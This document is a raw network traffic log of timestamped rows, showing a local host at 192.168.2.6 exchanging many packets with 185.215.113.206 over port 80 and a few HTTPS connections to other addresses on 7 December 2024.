Dec 7, 2024 10:51:47.563776970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.563858986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.563891888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.564048052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.564734936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.564857960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.564929962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.565788031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.565861940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.565892935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.565926075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.566745996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.566828012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.566859007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.566906929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.567770004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.567847967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.567992926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.568069935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.568723917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.568809986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.568882942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.569777012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.569865942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.569885969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.570007086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.570705891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.570782900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.570807934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.570853949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.571662903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.571716070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.571739912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.571763992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.572681904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.572752953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.572823048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.572990894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.573676109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.573764086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.573842049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.573920012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.574621916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.574691057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.574773073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.574814081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.575639963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.575711012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.575728893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.575773001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.576594114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.576648951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.576703072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.576756954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.577573061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.577682972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.577708960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.577729940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.578569889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.578649044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.578684092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.578727007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.579564095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.579638004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.579710007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.579838037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.580564022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.580600023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.580626965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.580655098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.581542969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.581619978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.581655025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.581702948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.582535982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.582554102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.582638979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.583508968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.583566904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.583607912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.583667040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.584521055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.584645033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.584660053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.584681988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.585495949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.585549116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.585586071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.585630894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.586472034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.586545944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.586595058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.586644888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.587522030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.587577105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.587579012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.587620974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.588494062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.588560104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.588567019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.588608980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.589437962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.589519024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.589613914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.590471983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.590522051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.590533018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.590595961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.591592073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.591625929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.591650009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.591692924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.592396021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.592442989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.592485905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.592525005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.593362093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.593561888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.733793974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.733814001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.733875036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.733923912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.734091043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.734217882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.734255075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.734291077 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.735076904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.735191107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.735253096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.735310078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.736092091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.736146927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.736171961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.736260891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.737061024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.737114906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.737160921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.737196922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.738044024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.738126993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.738171101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.738209963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.739027977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.739094973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.739129066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.739244938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.740019083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.740082979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.740118980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.740151882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.741029024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.741137981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.741151094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.741189003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.742026091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.742079020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.742126942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.742166042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.742995024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.743046999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.743107080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.743148088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.744003057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.744075060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.744122028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.744168997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.744990110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.745040894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.745096922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.745374918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.745985031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.746057987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.746068001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.746093035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.747201920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.747276068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.747369051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.747792959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.748310089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.748416901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.748460054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.748509884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.749385118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.749444962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.749495983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.750082970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.750135899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.750144958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.750180006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.750904083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.750972033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.750977993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.751013994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.751916885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.752001047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.752130032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.752180099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.752895117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.752918959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.752950907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.752995014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.753890991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.753943920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.783859015 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:47.783957005 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:47.793246031 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:47.793345928 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:47.801613092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.832287073 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:47.832317114 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:47.832946062 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:47.832954884 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:47.836735010 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:47.836761951 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:47.837119102 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:47.837121964 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:47.837162971 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:47.883333921 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:47.921500921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.225667000 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.225714922 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.225730896 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.225758076 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.225771904 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.225804090 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.225809097 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.225821972 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.225846052 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.225866079 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.226315975 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:48.226334095 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:48.243779898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.243834019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.243875027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.243922949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.244164944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.244206905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.244287014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.244335890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.245165110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.245225906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.245290995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.245335102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.246011972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.246078014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.246124029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.246232986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.246896982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.246942997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.247031927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.247071028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.247855902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.247976065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.248012066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.248025894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.248871088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.248928070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.248955011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.248996019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.249842882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.249888897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.249927998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.249965906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.250979900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.251028061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.251035929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.251075983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.251844883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.251925945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.251941919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.251986027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.252832890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.252911091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.252978086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.253094912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.253818989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.253874063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.253879070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.253907919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.254878044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.254940033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.254992962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.255162001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.255877972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.255937099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.255959988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.255992889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.256825924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.256896019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.256907940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.257019997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.257745981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.257797956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.257844925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.257879972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.258748055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.258796930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.258838892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.258910894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.259737968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.259788036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.259836912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.259879112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.260740995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.260811090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.260858059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.260900021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.261831999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.261903048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.262003899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.262057066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.262717962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.262778997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.262809038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.262845039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.263757944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.263818979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.263833046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.263875008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.264702082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.264760017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.264770031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.264797926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.265691996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.265753984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.265758991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.265896082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.266670942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.266691923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.266716957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.266736984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.267649889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.267713070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.267745972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.267786026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.268635988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.268759012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.268789053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.268877983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.269655943 CET	80	49808	185.215.113.206	192.168.2.6
